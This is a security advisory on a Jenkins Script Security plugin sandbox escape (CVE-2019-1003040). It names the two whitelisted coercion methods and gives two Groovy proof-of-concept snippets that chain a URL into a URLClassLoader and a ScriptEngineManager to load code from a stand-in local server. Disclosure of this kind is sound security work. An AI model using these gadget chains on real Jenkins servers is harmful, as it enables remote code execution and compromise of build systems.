CVE-2019-1003040: Jenkins Script Security plugin sandbox escape

Website: https://wiki.jenkins.io/display/JENKINS/Script+Security+Plugin

The Jenkins Script Security plugin prior to version 1.56 was vulnerable to code execution due to a sandbox escape. The plugin whitelisted two static methods in the default configuration. These methods both allowed for type coersion between arbitrary objects and classes. For example, a java.lang.String could be coerced into a java.net.URL. The vulnerable methods searched for a relevant constructor and automatically called it before attempting to cast. This pattern can be used to produce a gadget chain and gain remote code execution.

Vulnerable methods:

staticMethod org.codehaus.groovy.runtime.ScriptBytecodeAdapter castToType java.lang.Object java.lang.Class
staticMethod org.kohsuke.groovy.sandbox.impl.Checker checkedCast java.lang.Class java.lang.Object boolean boolean boolean

Proof-of-concepts:

import org.codehaus.groovy.runtime.ScriptBytecodeAdapter
def url    = ["http://127.0.0.1:5000/"] as java.net.URL
def loader = ScriptBytecodeAdapter.castToType([url], java.net.URLClassLoader)
def engine = ScriptBytecodeAdapter.castToType([loader], javax.script.ScriptEngineManager)

import org.kohsuke.groovy.sandbox.impl.Checker
def url    = ["http://127.0.0.1:5000/"] as java.net.URL
def loader = Checker.checkedCast(java.net.URLClassLoader, [url], true, false, false)
def engine = Checker.checkedCast(javax.script.ScriptEngineManager, [loader], true, false, false)